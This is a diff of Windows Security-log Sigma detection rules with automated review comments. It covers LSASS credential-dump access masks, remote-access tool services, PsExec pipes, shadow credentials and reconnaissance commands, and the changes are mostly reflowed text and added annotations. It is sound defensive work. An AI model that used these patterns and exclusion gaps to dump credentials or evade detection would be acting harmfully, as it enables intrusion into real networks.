+ type: similar
 status: experimental
-description: Detects service installation of different remote access tools software.
- These software are often abused by threat actors to perform
+description: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
 references:
 - https://redcanary.com/blog/misbehaving-rats/
 author: Connor Martin, Nasreddine Bencherchali (Nextron Systems)
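Review bot: The new comment `# triggering on many hosts in some environments` sits under `falsepositives:` next to the only entry, `- Unknown`, which it contradicts, and YAML comments are dropped by every converter, so consumers of the rule never see it. Promote it to a list entry, e.g. `- Unknown; the rule is reported to trigger on many hosts in some environments`, and drop the comment. The other added comment, `# Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816`, appears to describe a condition from the reference (failure audits only) that the `selection` does not enforce; if that is what makes the `AccessMask` value usable, say so in `definition:` or the description rather than in a comment inside the selection.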
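Review bot: The reflowed description of win_security_service_install_remote_access_software.yml ends mid-sentence: `These software are often abused by threat actors to perform` has no object, and joining the two old lines into one makes the fragment more visible, not less. Since the line is rewritten anyway, finish or trim the sentence, e.g. `... remote access tools software. These tools are often abused by threat actors.`, or restore whatever the upstream rule intended after `to perform`. The `ServiceName|contains` list that this description introduces is in the next hunk (line 2055), which only adds reference comments.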
@@ -18,38 +17,37 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The 'System Security Extension' audit subcategory need to be enabled
- to log the EID 4697
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
 detection:
 security:
 Channel: Security
 selection:
 EventID: 4697
 ServiceName|contains:
- - AmmyyAdmin
+ # Based on https://github.com/SigmaHQ/sigma/pull/2841
+ - AmmyyAdmin # https://www.ammyy.com/en/
 - Atera
- - BASupportExpressSrvcUpdater
- - BASupportExpressStandaloneService
+ - BASupportExpressSrvcUpdater # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html
+ - BASupportExpressStandaloneService # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html
 - chromoting
- - GoToAssist
- - GoToMyPC
+ - GoToAssist # https://www.goto.com/it-management/resolve
+ - GoToMyPC # https://get.gotomypc.com/
 - jumpcloud
- - LMIGuardianSvc
- - LogMeIn
+ - LMIGuardianSvc # https://www.logmein.com/
+ - LogMeIn # https://www.logmein.com/
 - monblanking
 - Parsec
- - RManService
- - RPCPerformanceService
- - RPCService
- - SplashtopRemoteService
+ - RManService # https://www.systemlookup.com/O23/7855-rutserv_exe.html
+ - RPCPerformanceService # https://www.remotepc.com/
+ - RPCService # https://www.remotepc.com/
+ - SplashtopRemoteService # https://www.splashtop.com/
 - SSUService
 - TeamViewer
- - TightVNC
+ - TightVNC # https://www.tightvnc.com/
 - vncserver
 - Zoho
 condition: security and selection
 falsepositives:
- - The rule doesn't look for anything suspicious so false positives are expected.
- If you use one of the tools mentioned, comment it out
+ - The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml b/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml
index 90888421c..582411bf1 100644
--- a/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml
+++ b/sigma/builtin/security/win_security_service_installation_by_unusal_client.yml
@@ -1,11 +1,10 @@
 title: Service Installed By Unusual Client - Security
 id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca
 related:
- - id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5
- type: similar
+ - id: 71c276aa-49cd-43d2-b920-2dcd3e6962d5
+ type: similar
 status: test
-description: Detects a service installed by a client which has PID 0 or whose parent
- has PID 0
+description: Detects a service installed by a client which has PID 0 or whose parent has PID 0
 references:
 - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html
 - https://www.x86matthew.com/view_post?id=create_svc_rpc
@@ -19,16 +18,15 @@ tags:
 logsource:
 service: security
 product: windows
- definition: 'Requirements: The System Security Extension audit subcategory need
- to be enabled to log the EID 4697'
+ definition: 'Requirements: The System Security Extension audit subcategory need to be enabled to log the EID 4697'
 detection:
 security:
 Channel: Security
 selection_eid:
 EventID: 4697
 selection_pid:
- - ClientProcessId: 0
- - ParentProcessId: 0
+ - ClientProcessId: 0
+ - ParentProcessId: 0
 condition: security and (all of selection_*)
 falsepositives:
 - Unknown
diff --git a/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml b/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml
index a2eb13f01..b90e480e1 100644
--- a/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml
+++ b/sigma/builtin/security/win_security_smb_file_creation_admin_shares.yml
@@ -1,8 +1,7 @@
 title: SMB Create Remote File Admin Share
 id: b210394c-ba12-4f89-9117-44a2464b9511
 status: test
-description: Look for non-system accounts SMB accessing a file with write (0x2) access
- mask via administrative share (i.e C$).
+description: Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).
 references:
 - https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml
 - https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file
diff --git a/sigma/builtin/security/win_security_susp_add_sid_history.yml b/sigma/builtin/security/win_security_susp_add_sid_history.yml
index 341fb774b..7aae648fe 100644
--- a/sigma/builtin/security/win_security_susp_add_sid_history.yml
+++ b/sigma/builtin/security/win_security_susp_add_sid_history.yml
@@ -27,9 +27,8 @@ detection:
 - '-'
 - '%%1793'
 filter_null:
- SidHistory: null
- condition: security and (selection1 or (selection2 and not selection3 and not
- filter_null))
+ SidHistory:
+ condition: security and (selection1 or (selection2 and not selection3 and not filter_null))
 falsepositives:
 - Migration of an account into a new domain
 level: medium
diff --git a/sigma/builtin/security/win_security_susp_computer_name.yml b/sigma/builtin/security/win_security_susp_computer_name.yml
index e6bb94b93..dd4efc2ae 100644
--- a/sigma/builtin/security/win_security_susp_computer_name.yml
+++ b/sigma/builtin/security/win_security_susp_computer_name.yml
@@ -19,6 +19,7 @@ logsource:
 service: security
 product: windows
 detection:
+ # Not adding an EventID on purpose to try to match on any event in security (including use of account), not just 4741 (computer account created)
 security:
 Channel: Security
 selection1:
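Review bot: In win_security_susp_add_sid_history.yml, `filter_null:` now reads `SidHistory:` with no value. A bare key is parsed as YAML null, so the filter still means "SidHistory is null/absent" and the `condition` is unchanged, but the removed `SidHistory: null` stated that intent explicitly, and a reader can mistake the bare key for an empty mapping or an accidental deletion. Keep `SidHistory: null`, or at least annotate it as `SidHistory: # null: matches events without a SidHistory value`, so the exclusion stays self-explanatory. The other hunks on this line only reflow text or add a comment.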
diff --git a/sigma/builtin/security/win_security_susp_dsrm_password_change.yml b/sigma/builtin/security/win_security_susp_dsrm_password_change.yml
index 1cee34a9b..be0f60b98 100644
--- a/sigma/builtin/security/win_security_susp_dsrm_password_change.yml
+++ b/sigma/builtin/security/win_security_susp_dsrm_password_change.yml
@@ -1,8 +1,7 @@
 title: Password Change on Directory Service Restore Mode (DSRM) Account
 id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51
 status: stable
-description: The Directory Service Restore Mode (DSRM) account is a local administrator
- account on Domain Controllers. Attackers may change the password to gain persistence.
+description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.
 references:
 - https://adsecurity.org/?p=1714
 author: Thomas Patzke
diff --git a/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml b/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml
index 610d549e8..d165227f7 100644
--- a/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml
+++ b/sigma/builtin/security/win_security_susp_failed_logon_reasons.yml
@@ -1,8 +1,7 @@
 title: Account Tampering - Suspicious Failed Logon Reasons
 id: 9eb99343-d336-4020-a3cd-67f3819e68ee
 status: test
-description: This method uses uncommon error codes on failed logons to determine suspicious
- activity and tampering with accounts that have been disabled or somehow restricted.
+description: This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
 references:
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625
 - https://twitter.com/SBousseaden/status/1101431884540710913
@@ -26,12 +25,12 @@ detection:
 - 4625
 - 4776
 Status:
- - '0xC0000072'
- - '0xC000006F'
- - '0xC0000070'
- - '0xC0000413'
- - '0xC000018C'
- - '0xC000015B'
+ - '0xC0000072' # User logon to account disabled by administrator
+ - '0xC000006F' # User logon outside authorized hours
+ - '0xC0000070' # User logon from unauthorized workstation
+ - '0xC0000413' # Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine
+ - '0xC000018C' # The logon request failed because the trust relationship between the primary domain and the trusted domain failed
+ - '0xC000015B' # The user has not been granted the requested logon type (aka logon right) at this machine
 filter:
 SubjectUserSid: S-1-0-0
 condition: security and (selection and not filter)
diff --git a/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml b/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml
index 95b7f31ad..5eb38cf3b 100644
--- a/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml
+++ b/sigma/builtin/security/win_security_susp_kerberos_manipulation.yml
@@ -1,8 +1,7 @@
 title: Kerberos Manipulation
 id: f7644214-0eb0-4ace-9455-331ec4c09253
 status: test
-description: This method triggers on rare Kerberos Failure Codes caused by manipulations
- of Kerberos messages
+description: This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages
 author: Florian Roth (Nextron Systems)
 date: 2017/02/10
 modified: 2021/11/27
diff --git a/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml b/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml
index 663989f53..e39ac3ff9 100644
--- a/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml
+++ b/sigma/builtin/security/win_security_susp_ldap_dataexchange.yml
@@ -1,9 +1,7 @@
 title: Suspicious LDAP-Attributes Used
 id: d00a9a72-2c09-4459-ad03-5e0a23351e36
 status: test
-description: Detects the usage of particular AttributeLDAPDisplayNames, which are
- known for data exchange via LDAP by the tool LDAPFragger and are additionally
- not commonly used in companies.
+description: Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
 references:
 - https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
 - https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
@@ -17,14 +15,7 @@ tags:
 logsource:
 product: windows
 service: security
- definition: The "Audit Directory Service Changes" logging policy must be configured
- in order to receive events. Audit events are generated only for objects with
- configured system access control lists (SACLs). Audit events are generated
- only for objects with configured system access control lists (SACLs) and only
- when accessed in a manner that matches their SACL settings. This policy covers
- the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default
- policy does not cover User objects. For that a custom AuditRule need to be
- setup (See https://github.com/OTRF/Set-AuditRule)
+ definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)
 detection:
 security:
 Channel: Security
diff --git a/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml b/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml
index dbbdaa939..0e629225c 100644
--- a/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml
+++ b/sigma/builtin/security/win_security_susp_local_anon_logon_created.yml
@@ -1,9 +1,7 @@
 title: Suspicious Windows ANONYMOUS LOGON Local Account Created
 id: 1bbf25b9-8038-4154-a50b-118f2a32be27
 status: test
-description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON,
- such as using additional spaces. Created as an covering detection for exclusion
- of Logon Type 3 from ANONYMOUS LOGON accounts.
+description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
 references:
 - https://twitter.com/SBousseaden/status/1189469425482829824
 author: James Pemberton / @4A616D6573
diff --git a/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml b/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml
index 64ada9035..424be2647 100644
--- a/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml
+++ b/sigma/builtin/security/win_security_susp_logon_explicit_credentials.yml
@@ -4,8 +4,7 @@ status: test
 description: Detects suspicious processes logging on with explicit credentials
 references:
 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
-author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st,
- Tim Shelton
+author: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton
 date: 2020/10/05
 modified: 2022/08/03
 tags:
diff --git a/sigma/builtin/security/win_security_susp_lsass_dump.yml b/sigma/builtin/security/win_security_susp_lsass_dump.yml
index 99641570c..4a9ce3d77 100644
--- a/sigma/builtin/security/win_security_susp_lsass_dump.yml
+++ b/sigma/builtin/security/win_security_susp_lsass_dump.yml
@@ -1,8 +1,7 @@
 title: Password Dumper Activity on LSASS
 id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c
 status: test
-description: Detects process handle on LSASS process with certain access mask and
- object type SAM_DOMAIN
+description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN
 references:
 - https://twitter.com/jackcr/status/807385668833968128
 author: sigma
diff --git a/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml b/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml
index da04386fb..9740a2fe3 100644
--- a/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml
+++ b/sigma/builtin/security/win_security_susp_lsass_dump_generic.yml
@@ -5,8 +5,7 @@ description: Detects process handle on LSASS process with certain access mask
 references:
 - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich,
- Aleksey Potapov, oscd.community (update)
+author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
 date: 2019/11/01
 modified: 2023/12/19
 tags:
@@ -20,23 +19,24 @@ detection:
 security:
 Channel: Security
 selection_1:
- EventID: 4656
+ EventID: 4656 # A handle to an object was requested.
 ObjectName|endswith: \lsass.exe
 AccessMask|contains:
 - '0x40'
 - '0x1400'
+ # - '0x1000' # minimum access requirements to query basic info from service
 - '0x100000'
- - '0x1410'
- - '0x1010'
- - '0x1438'
- - '0x143a'
- - '0x1418'
+ - '0x1410' # car.2019-04-004
+ - '0x1010' # car.2019-04-004
+ - '0x1438' # car.2019-04-004
+ - '0x143a' # car.2019-04-004
+ - '0x1418' # car.2019-04-004
 - '0x1f0fff'
 - '0x1f1fff'
 - '0x1f2fff'
 - '0x1f3fff'
 selection_2:
- EventID: 4663
+ EventID: 4663 # An attempt was made to access an object
 ObjectName|endswith: \lsass.exe
 AccessList|contains:
 - '4484'
@@ -47,21 +47,21 @@ detection:
 - \GamingServices.exe
 - \lsm.exe
 - \MicrosoftEdgeUpdate.exe
- - \minionhost.exe
- - \MRT.exe
- - \MsMpEng.exe
+ - \minionhost.exe # Cyberreason
+ - \MRT.exe # MS Malware Removal Tool
+ - \MsMpEng.exe # Defender
 - \perfmon.exe
 - \procexp.exe
 - \procexp64.exe
 - \svchost.exe
 - \taskmgr.exe
- - \thor.exe
- - \thor64.exe
+ - \thor.exe # THOR
+ - \thor64.exe # THOR
 - \vmtoolsd.exe
- - \VsTskMgr.exe
+ - \VsTskMgr.exe # McAfee Enterprise
 - \wininit.exe
 - \wmiprvse.exe
- - RtkAudUService64
+ - RtkAudUService64 # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff
 ProcessName|contains:
 - :\Program Files (x86)\
 - :\Program Files\
@@ -71,7 +71,7 @@ detection:
 - :\Windows\SysWow64\
 - :\Windows\Temp\asgard2-agent\
 filter_main_generic:
- ProcessName|contains: :\Program Files
+ ProcessName|contains: :\Program Files # too many false positives with legitimate AV and EDR solutions
 filter_main_exact:
 ProcessName|endswith:
 - :\Windows\System32\taskhostw.exe
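Review bot: In the hunk at -47, `RtkAudUService64` is the only entry of the executable list written without a leading backslash or `.exe`; the list's key is outside the hunk, but the surrounding `\...exe` entries suggest an `endswith` modifier, and an `endswith` pattern without the `.exe` suffix cannot match a full path that ends in `.exe`, so the Realtek exclusion the linked FalconForce post motivates may never apply. Confirm the field value and, if the intent is the service binary, write it as `- \RtkAudUService64.exe # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff`, or move it under the `ProcessName|contains` list that follows. The new comment `# Cyberreason` also misspells the vendor name, `Cybereason`.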
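Review bot: `filter_main_generic: ProcessName|contains: :\Program Files` (hunk at -71) excludes every process under either Program Files tree from both selections, and the new comment only records the motivation (AV/EDR noise), not the resulting coverage gap; since this rule is the generic LSASS-access detection, that gap should be visible where consumers read it, e.g. add `- Any process running from a Program Files directory is excluded by filter_main_generic and is not evaluated by this rule` under `falsepositives`. The broad exclusion also makes the `:\Program Files (x86)\` and `:\Program Files\` entries of the preceding filter's `ProcessName|contains` list (hunk at -47) redundant, which is worth a comment there so nobody tightens one without the other. A narrower alternative is to enumerate the vendor directories actually present in the environment. The `condition` that combines these filters is outside this hunk (it is in the hunk at -109 on the next line).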
@@ -85,6 +85,7 @@ detection:
 ProcessName|endswith: \aurora-agent-64.exe
 AccessList|contains: '%%4484'
 filter_main_scenarioengine:
+ # Example: C:\a70de9569c3a5aa22184ef52a890177b\x64\SCENARIOENGINE.EXE
 ProcessName|endswith: \x64\SCENARIOENGINE.EXE
 AccessList|contains: '%%4484'
 filter_main_avira1:
@@ -109,10 +110,8 @@ detection:
 - \procmon64.exe
 - \procmon.exe
 AccessList|contains: '%%4484'
- condition: security and (1 of selection_* and not 1 of filter_main_* and not 1
- of filter_optional_*)
+ condition: security and (1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*)
 falsepositives:
- - Legitimate software accessing LSASS process for legitimate reason; update the
- whitelist with it
+ - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_susp_net_recon_activity.yml b/sigma/builtin/security/win_security_susp_net_recon_activity.yml
index 47ffa723b..32b01f92f 100644
--- a/sigma/builtin/security/win_security_susp_net_recon_activity.yml
+++ b/sigma/builtin/security/win_security_susp_net_recon_activity.yml
@@ -1,12 +1,10 @@
 title: Reconnaissance Activity
 id: 968eef52-9cff-4454-8992-1e74b9cbad6c
 status: test
-description: Detects activity as "net user administrator /domain" and "net group domain
- admins /domain"
+description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
 references:
 - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html
-author: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements),
- oscd.community
+author: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community
 date: 2017/03/07
 modified: 2022/08/22
 tags:
@@ -17,9 +15,7 @@ tags:
logsource:
product: windows
service: security
- definition: The volume of Event ID 4661 is high on Domain Controllers and therefore
- "Audit SAM" and "Audit Kernel Object" advanced audit policy settings are not
- configured in the recommendations for server systems
+ definition: The volume of Event ID 4661 is high on Domain Controllers and therefore "Audit SAM" and "Audit Kernel Object" advanced audit policy settings are not configured in the recommendations for server systems
detection:
security:
Channel: Security
diff --git a/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml b/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml
index 749692c8c..8e574a43b 100644
--- a/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml
+++ b/sigma/builtin/security/win_security_susp_opened_encrypted_zip.yml
@@ -1,8 +1,7 @@
title: Password Protected ZIP File Opened
id: 00ba9da1-b510-4f6b-b258-8d338836180f
status: test
-description: Detects the extraction of password protected ZIP archives. See the filename
- variable for more details on which file has been opened.
+description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
references:
- https://twitter.com/sbousseaden/status/1523383197513379841
author: Florian Roth (Nextron Systems)
@@ -19,7 +18,7 @@ detection:
selection:
EventID: 5379
TargetName|contains: Microsoft_Windows_Shell_ZipFolder:filename
- filter:
+ filter: # avoid overlaps with 54f0434b-726f-48a1-b2aa-067df14516e4
TargetName|contains: \Temporary Internet Files\Content.Outlook
condition: security and (selection and not filter)
falsepositives:
diff --git a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml
index ad625815c..9047fbfcc 100644
--- a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml
+++ b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml
@@ -1,9 +1,7 @@
title: Password Protected ZIP File Opened (Suspicious Filenames)
id: 54f0434b-726f-48a1-b2aa-067df14516e4
status: test
-description: Detects the extraction of password protected ZIP archives with suspicious
- file names. See the filename variable for more details on which file has been
- opened.
+description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
references:
- https://twitter.com/sbousseaden/status/1523383197513379841
author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml
index a7d047ecd..6b598f552 100644
--- a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml
+++ b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml
@@ -1,8 +1,7 @@
title: Password Protected ZIP File Opened (Email Attachment)
id: 571498c8-908e-40b4-910b-d2369159a3da
status: test
-description: Detects the extraction of password protected ZIP archives. See the filename
- variable for more details on which file has been opened.
+description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
references:
- https://twitter.com/sbousseaden/status/1523383197513379841
author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml b/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml
index a435109b2..d1be028ec 100644
--- a/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml
+++ b/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml
@@ -1,11 +1,10 @@
title: Suspicious Outbound Kerberos Connection - Security
id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350
related:
- - id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74
- type: similar
+ - id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74
+ type: similar
status: test
-description: Detects suspicious outbound network activity via kerberos default port
- indicating possible lateral movement or first stage PrivEsc via delegation.
+description: Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
references:
- https://github.com/GhostPack/Rubeus
author: Ilyas Ochkov, oscd.community
@@ -30,6 +29,10 @@ detection:
- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
- C:\Program Files\Mozilla Firefox\firefox.exe
- C:\Program Files (x86)\Mozilla Firefox\firefox.exe
+ # filter_browsers:
+ # Application|endswith:
+ # - '\opera.exe'
+ # - '\tomcat\bin\tomcat8.exe'
condition: security and (selection and not 1 of filter_*)
falsepositives:
- Web Browsers
diff --git a/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml b/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml
index 6e34e1eb1..4a7a53703 100644
--- a/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml
+++ b/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml
@@ -1,8 +1,7 @@
title: Possible Shadow Credentials Added
id: f598ea0c-c25a-4f72-a219-50c44411c791
status: test
-description: Detects possible addition of shadow credentials to an active directory
- object.
+description: Detects possible addition of shadow credentials to an active directory object.
references:
- https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html
- https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/
@@ -15,24 +14,24 @@ tags:
logsource:
product: windows
service: security
- definition: The "Audit Directory Service Changes" logging policy must be configured
- in order to receive events. Audit events are generated only for objects with
- configured system access control lists (SACLs). Audit events are generated
- only for objects with configured system access control lists (SACLs) and only
- when accessed in a manner that matches their SACL settings. This policy covers
- the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default
- policy does not cover User objects. For that a custom AuditRule need to be
- setup (See https://github.com/OTRF/Set-AuditRule)
+ definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)
detection:
security:
Channel: Security
selection:
EventID: 5136
AttributeLDAPDisplayName: msDS-KeyCredentialLink
+ # If you experience a lot of FP you could uncomment the selection below
+ # There could be other cases for other tooling add them accordingly
+ # AttributeValue|contains: 'B:828'
+ # OperationType: '%%14674' # Value Added
+ # As stated in the FP sections it's better to filter out the expected accounts that perform this operation to tighten the logic
+ # Uncomment the filter below and add the account name (or any other specific field) accordingly
+ # Don't forget to add it to the condition section below
+ # filter:
+ # SubjectUserName: "%name%"
condition: security and selection
falsepositives:
- - Modifications in the msDS-KeyCredentialLink attribute can be done legitimately
- by the Azure AD Connect synchronization account or the ADFS service account.
- These accounts can be added as Exceptions. (From elastic FP section)
+ - Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)
level: high
ruletype: Sigma
diff --git a/sigma/builtin/security/win_security_susp_psexec.yml b/sigma/builtin/security/win_security_susp_psexec.yml
index 38c3ee215..2460d626f 100644
--- a/sigma/builtin/security/win_security_susp_psexec.yml
+++ b/sigma/builtin/security/win_security_susp_psexec.yml
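Review bot: The commented-out guidance added under `selection` says to "add it to the condition section below" without spelling out the change, and the sketched `filter:` sits at the same indentation as the `AttributeValue`/`OperationType` hints that belong inside `selection`, so a reader uncommenting it could easily produce an invalid rule. I would make the last hint self-contained, e.g. `# filter:` / `#     SubjectUserName: "%name%"` followed by `# condition: security and (selection and not filter)`, so the intended shape is unambiguous. The `%%14674` hint is annotated (`# Value Added`); the `B:828` hint would benefit from the same style, since it currently gives no indication of what that prefix selects.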
@@ -1,9 +1,7 @@
title: Suspicious PsExec Execution
id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82
status: test
-description: detects execution of psexec or paexec with renamed service name, this
- rule helps to filter out the noise if psexec is used for legit purposes or if
- attacker uses a different psexec client other than sysinternal one
+description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one
references:
- https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
author: Samir Bousseaden
@@ -15,14 +13,13 @@ tags:
logsource:
product: windows
service: security
- definition: The advanced audit policy setting "Object Access > Audit Detailed
- File Share" must be configured for Success/Failure
+ definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure
detection:
security:
Channel: Security
selection1:
EventID: 5145
- ShareName: \\\\\*\\IPC$
+ ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$
RelativeTargetName|endswith:
- -stdin
- -stdout
diff --git a/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml b/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml
index f7ffadb55..14a882369 100644
--- a/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml
+++ b/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml
@@ -1,8 +1,8 @@
title: Suspicious Access to Sensitive File Extensions
id: 91c945bc-2ad1-4799-a591-4d00198a1215
related:
- - id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc
- type: similar
+ - id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc
+ type: similar
status: test
description: Detects known sensitive file extensions accessed on a network share
author: Samir Bousseaden
diff --git a/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml b/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml
index aa5ab8b70..3caf1ae7b 100644
--- a/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml
+++ b/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml
@@ -1,8 +1,7 @@
title: Suspicious Scheduled Task Creation
id: 3a734d25-df5c-4b99-8034-af1ddb5883a4
status: test
-description: Detects suspicious scheduled task creation events. Based on attributes
- such as paths, commands line flags, etc.
+description: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
references:
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698
author: Nasreddine Bencherchali (Nextron Systems)
@@ -16,9 +15,7 @@ tags:
logsource:
product: windows
service: security
- definition: The Advanced Audit Policy setting Object Access > Audit Other Object
- Access Events has to be configured to allow this detection. We also recommend
- extracting the Command field from the embedded XML in the event data.
+ definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.
detection:
security:
Channel: Security
